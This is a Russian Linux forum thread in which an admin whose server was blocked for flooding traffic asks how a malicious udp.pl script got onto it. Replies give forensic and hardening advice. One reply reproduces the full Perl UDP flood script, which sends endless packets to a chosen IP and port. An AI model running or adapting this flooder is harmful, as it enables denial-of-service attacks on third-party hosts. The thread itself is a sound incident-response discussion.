LINUX.ORG.RU

udp.pl как обнаружить и ликвидировать?


0

1

Сервер заблокировали в датацентре за отсылку огромного количества пакетов.
Зашел через kvm, увидел в процессах udp.pl, который собственно и генерировал этот трафик.
Убил процесс, нашел в /tmp/ этот скрипт, удалил, удалил wget, поменял все пароли.

Как мог произойти взлом(я так понимаю права root взломщик не получил) и что сделать, чтобы такое не повторялось?

надо было выложить на пастебин какой-нибудь перед удалением -_-

anonymous ()

Вы бы хоть посмотрели, кому файл принадлежал.

AITap ★★★★★ ()

> Убил процесс, нашел в /tmp/ этот скрипт, удалил, удалил wget, поменял все пароли.

Удалять скрипт не надо было, надо было хотя бы перенести куда-нибудь, чтобы потом посмотреть. А вообще обычно кладут в /tmp и /var/tmp скрипты через php-ятину дырявую. Смотри новые файлы в DocumentRoot.

Deleted ()

Содержимое upd.pl показал бы хоть.

blackst0ne ★★★★★ ()
#!/usr/bin/perl

#####################################################

# udp flood.

#

# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.

#

# --/odix

######################################################



use Socket;



$ARGC=@ARGV;



if ($ARGC !=3) {

printf "$0 <ip> <port> <time>n";

printf "if arg1/2 =0, randports/continous packets.n";

exit(1);

}



my ($ip,$port,$size,$time);

$ip=$ARGV[0];

$port=$ARGV[1];

$time=$ARGV[2];



socket(crazy, PF_INET, SOCK_DGRAM, 17);

   $iaddr = inet_aton("$ip");



printf "udp flood - odixn";



if ($ARGV[1] ==0 && $ARGV[2] ==0) {

goto randpackets;

}

if ($ARGV[1] !=0 && $ARGV[2] !=0) {

system("(sleep $time;killall -9 udp) &");

goto packets;

}

if ($ARGV[1] !=0 && $ARGV[2] ==0) {

goto packets;

}

if ($ARGV[1] ==0 && $ARGV[2] !=0) {

system("(sleep $time;killall -9 udp) &");

goto randpackets;

}



packets:

for (;;) {

$size=$rand x $rand x $rand;

send(crazy, 0, $size, sockaddr_in($port, $iaddr));

}



randpackets:

for (;;) {

$size=$rand x $rand x $rand;

$port=int(rand 65000) +1;

send(crazy, 0, $size, sockaddr_in($port, $iaddr));

}
anonymous ()

надо было логать удаленно :3 ССЗБ

x0r ★★★★★ ()

У тебя вопрос как флуд обнаружить или как от взлома защититься?

true_admin ★★★★★ ()
Ответ на: комментарий от anonymous

Какой кривой код, это писал бывший пользователь бейсика или фортрана?

Xenius ★★★★★ ()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.